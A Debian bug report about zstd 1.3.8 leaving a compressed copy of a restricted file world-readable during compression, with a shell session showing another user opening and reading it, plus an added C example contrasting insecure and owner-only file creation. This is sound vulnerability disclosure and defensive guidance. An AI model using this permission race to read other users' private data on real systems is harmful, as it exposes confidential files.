[Debian-med-packaging] Bug#981404: compressed file is world readable, while zstd is running
Harald Dunkel
harri at afaics.de
Sat Jan 30 16:34:45 GMT 2021
Package: zstd
Version: 1.3.8+dfsg-3
Severity: critical
When compressing a large file with restricted access permissions, a new,
world-readable file is created, revealing the contents of the
uncompressed file. Sample:
# whoami
root
# zstd -q -13 -T8 sample.dmp &> zstd.log &
:
:
# ls -al
total 385983012
drwxr-xr-x 2 root root 4096 Jan 30 16:01 .
drwxr-xr-x 35 root root 4096 Jan 30 15:39 ..
-rw------- 1 oracle users 279265214464 Jan 29 22:02 sample.dmp
-rw-r--r-- 1 root root 115981336576 Jan 30 16:25 sample.dmp.zst
-rw-r--r-- 1 root root 0 Jan 30 16:01 zstd.log
:
:
[1]+ Done zstd -q -13 -T8 sample.dmp &> zstd.log
# md5sum sample.dmp.zst
5a3d3401e8e46483659e820f96ad0ef0 sample.dmp.zst
An attacker might be able to open(2) the file while zstd is still
running, wait for zstd to complete its job, and then read(2) the
whole file:
% whoami
attacker
% ls -al
total 465071584
drwxr-xr-x 2 root root 4096 Jan 30 16:01 .
drwxr-xr-x 35 root root 4096 Jan 30 15:39 ..
-rw------- 1 oracle users 279265214464 Jan 29 22:02 sample.dmp
-rw-r--r-- 1 root root 196968022016 Jan 30 16:41 sample.dmp.zst
-rw-r--r-- 1 root root 0 Jan 30 16:01 zstd.log
% md5sum sample.dmp.zst
^Z
[1]+ Stopped md5sum sample.dmp.zst
:
:
% ls -al
total 475580484
drwxr-xr-x 2 root root 4096 Jan 30 16:01 .
drwxr-xr-x 35 root root 4096 Jan 30 15:39 ..
-rw------- 1 oracle users 279265214464 Jan 29 22:02 sample.dmp
-rw------- 1 oracle users 207729131801 Jan 29 22:02 sample.dmp.zst
-rw-r--r-- 1 root root 0 Jan 30 16:01 zstd.log
% fg
md5sum sample.dmp.zst
5a3d3401e8e46483659e820f96ad0ef0 sample.dmp.zst
%
In this sample session the attacker got the correct md5sum, just for
demonstration purposes. He could have created his own private copy in
the same way.
This makes zstd unusable for me.
Regards
Harri
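The window the report describes, as an added example that is not zstd's code: the "create the output with the default mode, copy the source's mode when done" pattern beside an owner-only-first pattern. A reader who open(2)s the file during the first pattern's write keeps that descriptor across the final chmod; with the second pattern there is never a moment at which the file is readable by others. The scratch directory, file names, function names and the 0600 source mode are assumptions made for the demonstration.

```c
/* Added example, not code from zstd: contrast the output-file creation
 * pattern the report describes (create with the default mode, chmod when
 * done) with an owner-only-first pattern. All paths and modes below are
 * assumptions for the demonstration. */
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Permission bits observed right after creation and after the final chmod. */
struct mode_trace {
    int early;   /* what another user could see while the writer is still busy */
    int final;   /* what is left on disk once the writer is done */
};

static int fd_mode(int fd) {
    struct stat st;
    return fstat(fd, &st) == 0 ? (int)(st.st_mode & 07777) : -1;
}

/* Pattern from the report: open() with 0666 (masked by the caller's umask),
 * write, and only copy the source's mode at the end. Anyone who opens the
 * file during the write keeps their descriptor across the chmod. */
struct mode_trace create_then_chmod(const char *out, mode_t src_mode) {
    struct mode_trace t = { -1, -1 };
    int fd = open(out, O_WRONLY | O_CREAT | O_TRUNC, 0666);
    if (fd < 0) return t;
    t.early = fd_mode(fd);
    /* ... compressed data would be written here ... */
    if (fchmod(fd, src_mode) == 0) t.final = fd_mode(fd);
    close(fd);
    return t;
}

/* Hardened pattern: create the output owner-only (0600 is never widened by a
 * umask) and O_EXCL so an existing file is not silently reused, then relax
 * to the source's mode only after the data is complete. */
struct mode_trace create_private_then_chmod(const char *out, mode_t src_mode) {
    struct mode_trace t = { -1, -1 };
    int fd = open(out, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) return t;
    t.early = fd_mode(fd);
    /* ... compressed data would be written here ... */
    if (fchmod(fd, src_mode) == 0) t.final = fd_mode(fd);
    close(fd);
    return t;
}

/* Run both patterns under the given umask in a private scratch directory,
 * restore the caller's umask and clean up. Returns 0 on success. */
int run_demo(mode_t um, struct mode_trace *insecure, struct mode_trace *secure) {
    char dir[] = "/tmp/zstd-perm-demo-XXXXXX";  /* hypothetical scratch dir */
    char a[256], b[256];
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(a, sizeof a, "%s/insecure.zst", dir);
    snprintf(b, sizeof b, "%s/secure.zst", dir);
    mode_t old = umask(um);
    *insecure = create_then_chmod(a, 0600);          /* source was -rw------- */
    *secure   = create_private_then_chmod(b, 0600);
    umask(old);
    unlink(a);
    unlink(b);
    rmdir(dir);
    return (insecure->final < 0 || secure->final < 0) ? -1 : 0;
}

int main(void) {
    struct mode_trace ins, sec;
    if (run_demo(022, &ins, &sec) != 0) return 1;
    printf("umask 022: create-then-chmod  early %04o final %04o\n", ins.early, ins.final);
    printf("umask 022: private-then-chmod early %04o final %04o\n", sec.early, sec.final);
    return 0;
}
```

With the owner-only-first pattern the writer's umask no longer matters, and both patterns end with the same final mode, so nothing is lost for the normal case. For a tool you cannot change, running it in a subshell as `(umask 077; zstd ...)` narrows the mode of any file it creates with the usual 0666 request, as fopen(3) does; whether zstd creates its output that way is an assumption here, not something the report states.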